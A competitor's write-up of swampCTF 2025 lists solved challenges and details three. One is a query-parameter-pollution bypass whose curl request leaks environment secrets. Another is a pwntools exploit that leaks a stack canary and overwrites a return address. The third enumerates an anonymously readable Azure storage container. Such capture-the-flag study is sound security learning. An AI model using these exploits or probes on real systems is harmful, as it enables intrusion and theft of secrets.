swampCTF 2025 Writeup

Competed solo under parakavia team name. Solved 24 out of 36 challenges, ranked 34th out of 751 teams with 3284 points (1st place team got 5295).

Challenge nameOne-liner reminderRemarks
SerialiesCall a HTTP GET API endpointweb, ✅ 20
SlowAPINext.js middleware special HTTP headerweb, 50
Hidden Message-BoardHTML view sourceweb, ✅ 50
Beginner WebHTML view sourceweb, ✅ 50
Sunset BoulevardXSS using artoo.loveweb, ✅ 100
ContaminationRuby reverse proxy + Flask web JSON parsingweb, 150
EditorReferer HTTP headerweb, ✅ 150
SwampTech SolutionsCookie injection, then PHP XML injectionweb, 200
MaybeHappyEndingGPTLeaky HTTP API, LLM system prompt injectionweb, ✅ 300
Beginner Pwn 1Basic bofpwn, ✅ 25
Beginner Pwn 2Basic ret2winpwn, ✅ 50
Greeting as a Servicepwn with coredump as the starting point, then ???pwn, 192
Tinybrain???pwn, 194
Oh my bufferUnflushed stdout buffer, bof to leak canary, return to flush stdoutpwn, ✅ 258
Notecard???pwn, 294
Pretty Picture: Double ExposureHidden message in specific rgba channel (stegsolve)misc, ✅ 25
Join our Discord!Plainly given in Discordmisc, ✅ 25
Read Between .tga LinesManually rearranging pixels of a .tga file, is there a better way here?misc, ✅ 85
Lost In TranslationWhitespace languagemisc, 158
Messages From The Stars???misc, 193
BlueFuzzing unsecured Azure storage accountmisc, ✅ 209
Homework HelpBasic Autopsyforensics, 50
Preferential TreatmentBasic pcap inspectionforensics, ✅ 150
Planetary StorageExotic db called orbitdb but plaintext data is inspectableforensics, ✅ 200
MuddyWaterExtracting NTLMv2 hash from pcap then hashcatforensics, ✅ 200
Proto Protopcap inspection, then basic rev to communicate with a server with unknown protocolforensics, ✅ 214
Proto Proto 2Proto Proto + guessing encryption method (actually XOR with a key that needs to be guessed)forensics, ✅ 289
Party Time!LatLong from EXIF, DMS formatosint, ✅ 50
On Thin IceSome hex string from EXIF which apparently is a quote from a video game, it asks the players to find an ice rink at the location of the gameosint, 84
Party Time! Level 2A fast food restaurant near the place of Party Time!osint, ✅ 150
SongCipherShift cipher using the lyrics of All Star by Smash Mouth as keycrypto, 148
Rock my PasswordBasic hashing, do as instructedcrypto, ✅ 150
Intercepted communications:Finding the reuse site of a one-time pad key, given some samples of plaintext and its ciphertextcrypto, ✅ 150
You Shall Not PassssELF with encrypted instructions, guessing the keyrev, ✅ 150
Midi MelodyMidi generator with choices, given an output file, reconstruct the choices. The choices form a morse code which is implicitly informed via the -h messagerev, ✅ 184
Wamp AudioA bespoke audio encoder, need to write the decoder, though some people just try to force load it as wavrev, 298

Contamination (web)

There is a Ruby reverse proxy + Python web server setup. The reverse proxy is meant to filter out “sensitive” request to /api?action=getFlag endpoint while also checks the request body JSON format.

The proxy

require 'sinatra'
require 'rack/proxy'
require 'json'

class ReverseProxy < Rack::Proxy
  def perform_request(env)
    request = Rack::Request.new(env)

    # Only allow requests to the /api?action=getInfo endpoint
    if request.params['action'] == 'getInfo'
      env['HTTP_HOST'] = 'backend:5000'
      env['PATH_INFO'] = '/api'
      env['QUERY_STRING'] = request.query_string
      body = request.body.read
      env['rack.input'] = StringIO.new(body)
      
      begin
        json_data = JSON.parse(body)
        puts "Received valid JSON data: #{json_data}"
        super(env)
      rescue JSON::ParserError => e
        puts "Error parsing JSON: #{e.message}"
        return [200, { 'Content-Type' => 'application/json' }, [{ message: "Error parsing JSON", error: e.message }.to_json]]
      end
    else
      [200, { 'Content-Type' => 'text/plain' }, ["Unauthorized"]]
    end
  end
end

use ReverseProxy

set :bind, '0.0.0.0'
set :port, 8080
puts "Server is listening on port 8080..."

The web application server

from flask import Flask, jsonify, request
import os
import logging

app = Flask(__name__)

app.config['DEBUG'] = os.getenv('DEBUG', 'False')
app.config['LOG_LEVEL'] = os.getenv('LOG_LEVEL', 'warning')


@app.route('/api', methods=['POST'])
def api():
    param = request.args.get('action')
    app.logger.info(f"Received param: {param}")

    if param == 'getFlag':
        try:
            data = request.get_json()
            app.logger.info(f"Received JSON data: {data}")
            return jsonify(message="Prased JSON successfully")
        except Exception as e:
            app.logger.error(f"Error parsing JSON: {e}")
            debug_data = {
                'headers': dict(request.headers),
                'method': request.method,
                'url': request.url,
                'env_vars': {key: value for key, value in os.environ.items()}
            }
            return jsonify(message="Something broke!!", debug_data=debug_data)

    if param == 'getInfo':
        debug_status = app.config['DEBUG']
        log_level = app.config['LOG_LEVEL']
        return jsonify(message="Info retrieved successfully!", debug=debug_status, log_level=log_level)

    return jsonify(message="Invalid action parameter!", param=param)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

After some trial, apparently specifying the action twice in the query string bypasses the filter.

/api?action=getFlag&action=getInfo

For some reason, the ruby code picks up the last one but the python code picks up the first one. At this point, the response from the servers is Prased JSON successfully.

I was not able to make the ruby code happy with the input but the python code throws while parsing the JSON. I had an idea to try non-unicode characters but googling “example of non unicode characters” did not return good responses. It is actually pretty simple, 0xFF is one that the ruby code is okay with but not python.

$ curl -X POST 'http://chals.swampctf.com:41234/api?action=getFlag&action=getInfo' -d '"\xff"' -H 'Content-Type: application/json'
{
  "debug_data": {
    "env_vars": {
      "DATABASE_URL": "sqlite:///app.db", 
      "DEBUG": "True", 
      "ENV": "development", 
      "FLASK_ENV": "development", 
      "GPG_KEY": "E3FF2839C048B25C084DEBE9B26995E310250568", 
      "HOME": "/root", 
      "HOSTNAME": "1c5449781218", 
      "LANG": "C.UTF-8", 
      "LOG_LEVEL": "info", 
      "PATH": "/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", 
      "PYTHON_SHA256": "3126f59592c9b0d798584755f2bf7b081fa1ca35ce7a6fea980108d752a05bb1", 
      "PYTHON_VERSION": "3.9.21", 
      "SECRET_KEY": "swampCTF{1nt3r0p3r4b1l1ty_p4r4m_p0llut10n_x7q9z3882e}", 
      "WERKZEUG_RUN_MAIN": "true", 
      "WERKZEUG_SERVER_FD": "3"
    }, 
    "headers": {
      "Accept": "*/*", 
      "Content-Length": "6", 
      "Content-Type": "application/json", 
      "Host": "backend:5000", 
      "User-Agent": "curl/8.7.1", 
      "Version": "HTTP/1.1", 
      "X-Forwarded-For": "84.239.12.12"
    }, 
    "method": "POST", 
    "url": "http://backend:5000/api?action=getFlag&action=getInfo"
  }, 
  "message": "Something broke!!"
}

Oh my buffer (pwn)

$ checksec ohmybuffer
[*] '/home/parakavia/swampctf25/ohmybuffer'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    RUNPATH:    b'/home/james/Swamp/chal2/outputs/out/lib:/nix/store/cmpyglinc9xl9pr4ymx8akl286ygl64x-glibc-2.40-66/lib:/nix/store/6kbrc4ca98srlfpgyaayl2q9zpg1gys6-gcc-14-20241116-lib/lib'
    Stripped:   No
    Debuginfo:  Yes

There is this binary executable that reads the flag, put it in a buffer, redirects the stdout to /dev/null, then writing the flag content to it without fflush. The stdout is restored later but the user will not be able to see the flag output.

Beyond that prolog, the user is given a menu to register or login.

  pFile = (FILE *)fopen("flag.txt","r");
  fgets(flag,0x40,(FILE *)pFile);
  fclose((FILE *)pFile);
  pNull = (FILE *)fopen("/dev/null","w");
  fd = dup(1);
  iVar1 = fileno((FILE *)pNull);
  dup2(iVar1,1);
  puts("Here\'s the flag, too bad we don\'t let you see this:");
  fflush(stdout);
  fputs(flag,stdout);
  memset(flag,0,0x40);
  dup2(fd,1);
  close(fd);
  fclose((FILE *)pNull);
  _Var2 = fork();
  if (_Var2 == 0) {
    while( true ) {
      do {
        while( true ) {
          write(1,"===================\n",0x14);
          write(1,"Welcome to the box!\n",0x14);
          write(1,"1) Register\n",0xc);
          write(1,"2) Login\n",9);
          write(1,"3) Exit\n",8);
          write(1,&DAT_0040212e,2);
          do {
            iVar1 = getchar();
            c = (char)iVar1;
          } while (c == '\n');
          iVar1 = atoi(&c);
          choice = iVar1 % 3;
          do {
            iVar1 = getchar();
          } while (iVar1 != 10);
          write(1,"-------------------\n",0x14);
          iVar1 = choice % 3;
          if (iVar1 != 2) break;
          login();
        }
      } while (2 < iVar1);
      if (iVar1 == 0) break;
      if (iVar1 == 1) {
        reg();
      }
    }
                    /* WARNING: Subroutine does not return */
    _exit(0);
  }

The login function can be used to leak stack information because it asks the user the length of a username and uses this number as length when writing to stdout.

void login(void) {
  long lVar1;
  long in_FS_OFFSET;
  int len;
  char buffer [16];
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  write(1,"How long is your username: ",0x1b);
  __isoc99_fscanf(stdin,&DAT_00402067,&len);
  write(1,"Username: ",10);
  read(0,buffer,0x10);
  write(1,"Sorry, we couldn\'t find the user: ",0x22);
  write(1,buffer,(long)len);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

The register function return address can be overwritten and the binary allows us to only overwrite two bytes of it and it already provides 0x40 prefix, which allows us to jump to anywhere 0x40xxxx. This is good enough.

void reg(void) {
  long lVar1;
  long in_FS_OFFSET;
  char buffer [16];
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  write(1,"Username: ",10);
  read(0,buffer,0x2a);
  write(1,"Password: ",10);
  read(0,buffer,0x2a);
  write(1,"Sorry, registration isn\'t open right now!\n",0x2a);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Since the challenge name heavily suggests that the flag is still in somewhere in some buffer, I investigated it using gdb to get the buffer address and checked the content after the fork() call. The flag actually is still there! Which means it is possible to just return to the fflush callsite.

        00401469 48 8b 05        MOV        RAX,qword ptr [stdout]
                 40 2c 00 00
        00401470 48 89 c7        MOV        RDI,RAX
        00401473 e8 a8 fc        CALL       <EXTERNAL>::fflush

The exploit:

  1. Leak canary using login.
  2. Return to 0x00401469 using reg.
from pwn import *

context.terminal = ["tmux", "splitw", "-h"]
context.log_level = "debug"
context.arch = "amd64"

elf = ELF('./ohmybuffer')
rop = ROP(elf)
print(rop.gadgets)

# telescope 0x405480
# 0x405480
# b *0x04014c9 fork
# b *0x04013a7 login
# b *0x040142c fnull
# b *0x04012c6 reg
# p = gdb.debug('./ohmybuffer', aslr=False, gdbscript="""
#     set follow-fork-mode child
#     b *0x04012c6
#     """)
p = remote('chals.swampctf.com', 40005)
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"-------------------\n")
p.recvuntil(b"How long is your username: ")
p.sendline(b"100")
p.recvuntil(b"Username: ")
p.send(cyclic(16))
p.recvuntil(b"find the user: ")
p.recv(8)
p.recv(8)
p.recv(8)
canary = int.from_bytes(p.recv(8), 'little')
stack = int.from_bytes(p.recv(8), 'little')
print(hex(canary), hex(stack))
p.recvuntil(b"> ")
p.sendline(b"1")
p.recvuntil(b"Username: ")
p.send(cyclic(42))
p.recvuntil(b"Password: ")
p.send(cyclic(cyclic_find('gaaa')) + p64(canary) + p64(stack) + b"\x69\x14")
p.recvuntil(b"> ")
p.interactive()

Blue (misc)

I don’t think this challenge is particularly interesting but since I don’t know Azure at all, I will write some note here. Storage account name is swampctf.

Steps:

  1. I started by googling ‘azure blob ctf’. I don’t remember why the blob keyword was there.

  2. I found this page by Brayan Rodriguez Padilla.

  3. I tested the URL to check if the error message is more like “not found” or “not permitted”. “not found”-ish means anonymous access is possible.

    https://<StorageAccountName>.blob.core.windows.net/$logs?restype=container&comp=list

  4. I started fuzzing manually. This is a hit.

    https://swampctf.blob.core.windows.net/test?restype=container&comp=list

<EnumerationResults ContainerName="https://swampctf.blob.core.windows.net/test">
	<Blobs>
		<Blob>
			<Name>flag_020525.txt</Name>
			<Url>https://swampctf.blob.core.windows.net/test/flag_020525.txt</Url>
			<Properties>
				<Last-Modified>Sun, 23 Mar 2025 00:06:10 GMT</Last-Modified>
				<Etag>0x8DD699E8450814D</Etag>
				<Content-Length>33</Content-Length>
				<Content-Type>text/plain</Content-Type>
				<Content-Encoding/>
				<Content-Language/>
				<Content-MD5>5ZNGtwXxYqORXNbxxdRTWg==</Content-MD5>
				<Cache-Control/>
				<BlobType>BlockBlob</BlobType>
				<LeaseStatus>unlocked</LeaseStatus>
			</Properties>
		</Blob>
	</Blobs>
	<NextMarker/>
</EnumerationResults>